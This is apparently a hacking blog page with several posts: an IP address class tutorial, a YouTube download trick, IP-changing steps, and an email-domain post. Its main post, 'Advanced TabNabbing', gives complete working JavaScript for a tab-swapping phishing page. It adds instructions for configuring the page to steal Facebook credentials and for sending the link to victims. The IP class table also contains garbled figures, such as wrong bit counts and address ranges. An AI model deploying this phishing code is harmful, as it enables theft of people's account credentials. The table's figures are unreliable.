IP Address Structure Introduction !

Hello Visitor,
                     Today I'll give an introduction to the IP address (Internet Protocol address). Every station on a PSN (packet switched network) that is based on the TCP/IP protocol (your computer is one, for example. Yes, we're referring to a host that is connected to the net) must have an IP address, so it can be identified, and information can be relayed and routed to it in an orderly fashion. An IP address consists of a 32 bit logical address. The address is divided
into two fields:

1) The network address:
Assigned by InterNIC (Internet Network Information Center).
In fact most ISPs (internet service providers) purchase a number of addresses
and assign them individually.

2) The host address:
An address that identifies the single nodes throughout the network. It can be assigned
by the network manager, by using protocols for it such as DHCP, or the workstation itself.

The IP networking protocol is a logically routed protocol, meaning that address 192.43.54.2
will be on the same physical wire as address 192.43.54.3 (of course this is not always true. It depends on the subnet mask of the network, but all of that can fill a text of its own).

IP address structure:

Every " --- " = 8 bits.
The first bits ===> network address
The last bits  ===> host address.
with 8 bits you can present from 0-255 . (binary=(2 to the power of 8)-1)


Example:
11000010.01011010.00011111.01001010 (binary)
194.90.31.74 (decimal)

IP address CLASSES:
We can classify IP addresses into 5 groups. You can distinguish them by comparing the "High Order" bits (the first four bits on the
left of the address):


Type | Model       | Target groups             | MSB  | Addr. range                  | Bit number (net./hosts) | Max. stations
-----|-------------|---------------------------|------|------------------------------|-------------------------|--------------
A    | N.h.h.h     | ALL ACCEPT HUGE CORPS     | 0    | 1.0.0.0 to 127.0.0.0         | 24/7                    | 16,777,214
B    | N.N.h.h     | TO ALL LARGE CORPS        | 10   | 128.1.00 to 191.254.00       | 16/14                   | 65,543
C    | N.N.N.h     | TO ALOT OF SMALL CORPS    | 110  | 192.0.1.0 to 223.225.254     | 8/22                    | 254
D    | NONE        | MULTI-CAST ADDR. RFC-1112 | 1110 | 224.0.0.0 to 239.255.255.255 | NOT FOR USUAL USE       | UNKNOWN
E    | NOT FOR USE | EXPERIMENTAL ADDR.        | 1111 | 240.0.0.0 to 254.255.255.255 | NOT FOR USE             | NOT FOR USE


N=NETWORK , h=HOST .

Notice the address range 127.X.X.X.
These addresses are assigned to internal use to the network device, and are
used as an application tool only. For example: 127.0.0.1, the most common one,
is called the loop-back address - everything sent here goes directly back to
you, without even traveling out on the wire.
Also, some IPs are reserved for VPNs - Virtual Private Networks. These are
local area networks over wide area networks that use the Internet Protocol to
communicate, and each computer inside the network is assigned with an IP
address. So, suppose a certain computer wants to send a data packet to
another host on the network with the IP 'x', but there's also another host on
the Internet that has the same IP - what happens now? So this is why you
cannot use these and other forms of reserved IPs on the Internet.

EXTRA:Distinguishing different groups:

You have to compare the first byte on the left in the address as follows:


Type | First byte in decimal | MSB
-----|-----------------------|-----
A    | 1-127                 | 0
B    | 128-191               | 10
C    | 192-223               | 110
D    | 224-239               | 1110
E    | 240-254               | 1111
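The comparison of the high-order bits described above, as an added Python example that is not part of the original text. The function names are assumptions made for illustration, and the classification follows the leading bits of the first byte only; the subnet-mask check uses constructed addresses.

```python
def parse_ipv4(text):
    """Turn a dotted-decimal address into its 32-bit integer value."""
    parts = text.strip().split(".")
    if len(parts) != 4:
        raise ValueError("expected four dot-separated fields: %r" % text)
    value = 0
    for part in parts:
        if not (part.isascii() and part.isdigit()) or int(part) > 255:
            raise ValueError("each field must be 0-255: %r" % text)
        value = (value << 8) | int(part)
    return value


def to_binary(text):
    """Show the address as four groups of 8 bits."""
    value = parse_ipv4(text)
    return ".".join(format((value >> shift) & 0xFF, "08b") for shift in (24, 16, 8, 0))


# (class, mask applied to the first byte, leading bits expected after masking)
CLASS_PREFIXES = [
    ("A", 0b10000000, 0b00000000),   # 0...
    ("B", 0b11000000, 0b10000000),   # 10..
    ("C", 0b11100000, 0b11000000),   # 110.
    ("D", 0b11110000, 0b11100000),   # 1110
    ("E", 0b11110000, 0b11110000),   # 1111
]


def address_class(text):
    """Classify an address by the leading bits of its first byte."""
    first_byte = parse_ipv4(text) >> 24
    for name, mask, bits in CLASS_PREFIXES:
        if first_byte & mask == bits:
            return name
    raise AssertionError("unreachable: the five prefixes cover every byte")


def same_network(addr_a, addr_b, subnet_mask):
    """Two hosts share a network when their masked addresses are equal."""
    mask = parse_ipv4(subnet_mask)
    return parse_ipv4(addr_a) & mask == parse_ipv4(addr_b) & mask


if __name__ == "__main__":
    print(to_binary("194.90.31.74"), address_class("194.90.31.74"))
    print(same_network("192.43.54.2", "192.43.54.3", "255.255.255.0"))
```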

NOTES: Yes, we know, we've left A LOT of things unexplained in this text.
With time, we will write more tutorials to cover these and other subjects. So
in the meantime, I suggest that you go to http://blacksun.box.sk, find the
tutorials page and see if there's anything else that's interesting to you.
And remember - we also have a message board, so if you have any questions,
feel free to post them there.

1) Multicast: (copied from RFC 1112)
  IP multicasting is the transmission of an IP datagram to a "host
  group", a set of zero or more hosts identified by a single IP
  destination address.  A multicast datagram is delivered to all
  members of its destination host group with the same "best-efforts"
  reliability as regular unicast IP datagrams, i.e., the datagram is
  not guaranteed to arrive intact at all members of the destination
  group or in the same order relative to other datagrams.

  The membership of a host group is dynamic; that is, hosts may join
  and leave groups at any time.  There is no restriction on the
  location or number of members in a host group.  A host may be a
  member of more than one group at a time.  A host need not be a member
  of a group to send datagrams to it.

  A host group may be permanent or transient.  A permanent group has a
  well-known, administratively assigned IP address.  It is the address,
  not the membership of the group, that is permanent; at any time a
  permanent group may have any number of members, even zero.  Those IP
  multicast addresses that are not reserved for permanent groups are
  available for dynamic assignment to transient groups which exist only
  as long as they have members.

  Internetwork forwarding of IP multicast datagrams (ip packets) is handled by
  "multicast routers" which may be co-resident with, or separate from,
  internet gateways.  A host transmits an IP multicast datagram as a
  local network multicast which reaches all immediately-neighboring
  members of the destination host group.  If the datagram has an IP
  time-to-live greater than 1, the multicast router(s) attached to the
  local network take responsibility for forwarding it towards all other
  networks that have members of the destination group.  On those other
  member networks that are reachable within the IP time-to-live, an
  attached multicast router completes delivery by transmitting the
  datagram (ip packet) as a local multicast.
  *If you do not understand the above, do not worry; it is complicated and dry,
  but reread it, and read it again; get a dictionary if it helps.
  Hacking is not easy.

2) MSB: Most Significant Bit:
  In set numbers the first number on the left is the most important because it
  holds the highest value, as opposed to the LSB (least significant bit), which
  always holds the smallest value.

Sunday, October 14, 2012

The Advance Hacking TabNabbing !

Hello Visitor,

                     Today I will explain this technique using an attack scenario and a live example, and how to protect yourself from such stuff.
Let's consider an attack scenario:
1. A hacker, say me (Sajal), customizes the current webpage by editing/adding some new parameters and variables (check the code below for details).
2. I (Sajal) send a copy of this web page to the victim whose account or whatever I want to hack.
3. Now when the user opens that link, a webpage similar to this one will open, containing the real page in an iframe with the help of JavaScript.
4. The user will be able to browse the website like the original one, going forward and backward and navigating through pages.
5. Now if the victim leaves the new webpage open for a certain period of time, the tab or website will change to a phish page, or simply a fake page, which will look absolutely similar to the original one.
6. Now when the user enters his/her credentials (username/password), he is entering them in the fake page and gets trapped in the net that I have laid down to hack him.
Here ends the attack scenario for advanced tabnabbing.


Before the coding part, let's first share tips to protect yourself from this kind of attack, because it's completely undetectable and you will never be able to know that your account got hacked or compromised. So first learn how to protect ourselves from advanced tabnabbing.

Follow the measures below to protect yourself from tabnabbing:
1. Always use anti-JavaScript plugins in your web browser that stop execution of malicious JavaScript. For example: NoScript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in an email or chat message, never directly click on it. Always prefer to type it manually in the address bar to open it; this may cost you some manual work or time, but it will protect you from hidden malicious URLs.
4. The best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:


<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (passward@2daymail.co.cc)
Website: http://www.bdcyberarmy.tk
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>


Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anything.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..


You can Also See My Older post Fishing Technique  

Download youtube videos without any software

This is simple trick which will allow you to download youtube videos without any software and in different formats such as mpeg4, 3gp, hd and many more.

    First Go to Youtube webpage.
    Then go to video you want to download.

       Example :  http://www.youtube.com/watch?v=_JAa3NvP6f4
 

Now add save before youtube and press enter.

       Example :  http://www.saveyoutube.com/watch?v=_JAa3NvP6f4
 

Now you will be redirected to a new page from where you can download video in any format of your choice
 

NOTE: In place of save you can also use kick

Saturday, October 13, 2012

Change your IP Address Manually and Easily!

Hello Visitor,
                     Today I'll explain how to change your Internet Protocol address (IP address) by a simple method. In my next post I'll show you how to grab someone's IP address; now I will show you how to change your IP address in less than a minute. For now it will take a few minutes, but with some practice you can do this within a minute.


    Click on "Start" in the bottom left corner of the screen.
    Click on "RUN"
    Type in "command" and press Enter


      You should be now at MSDOS prompt Screen

    Type "ipconfig /release" just like that, and press "Enter"
    Type "exit" and leave the prompt
    Right-click on "Network Places" or "My Network Places" on your desktop.
    Click on "properties"


     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

     Right click on "Local Area Connection" and click "properties"
    Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
    Click on "Use the following IP address" under the "General" tab
    Create an IP address (It doesn't matter what it is)
    Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
    Press the "Ok" button here
    Hit the "Ok" button again


     Now you should be back to the "Local Area Connection" screen.

    Right-click back on "Local Area Connection" and go to properties again.
    Go back to the "TCP/IP" settings
    This time, select "Obtain an IP address automatically"
    Click on "Ok"
    Hit "Ok" again.
    Now you have got a New IP address.

Tuesday, October 2, 2012

Create a Free Secure Email Database Fast & Easily!

Hello visitor, today I'll explain how to create a secure email database that you can control at any time.
You can also delete or create an email ID. Most of the time we need a mail address to use
an internet service. Most of the time we use Yahoo, Gmail or Hotmail, but you can't always register
exactly the username you like, because the username already exists. So today
I'll explain a 100% working system that gives you an email database, not only an email
address. Everybody can open a mailbox under this database, and you control it at any time. These mail
addresses support Microsoft Outlook Express or other mailing software. Users can also log in
to the ID through Windows Live or Google. Let's go through the easy, simple, free and secure steps.


 Step 1: A personal custom domain, e.g. .com, .net, .tk, .co.cc (use it for the MX zone record).
 Step 2: A mail hosting provider, e.g. Microsoft, Google or another service provider.
See the screenshot and follow the simple steps.
You can also try our mail service.
 

Get a free account @2daymail.co.cc
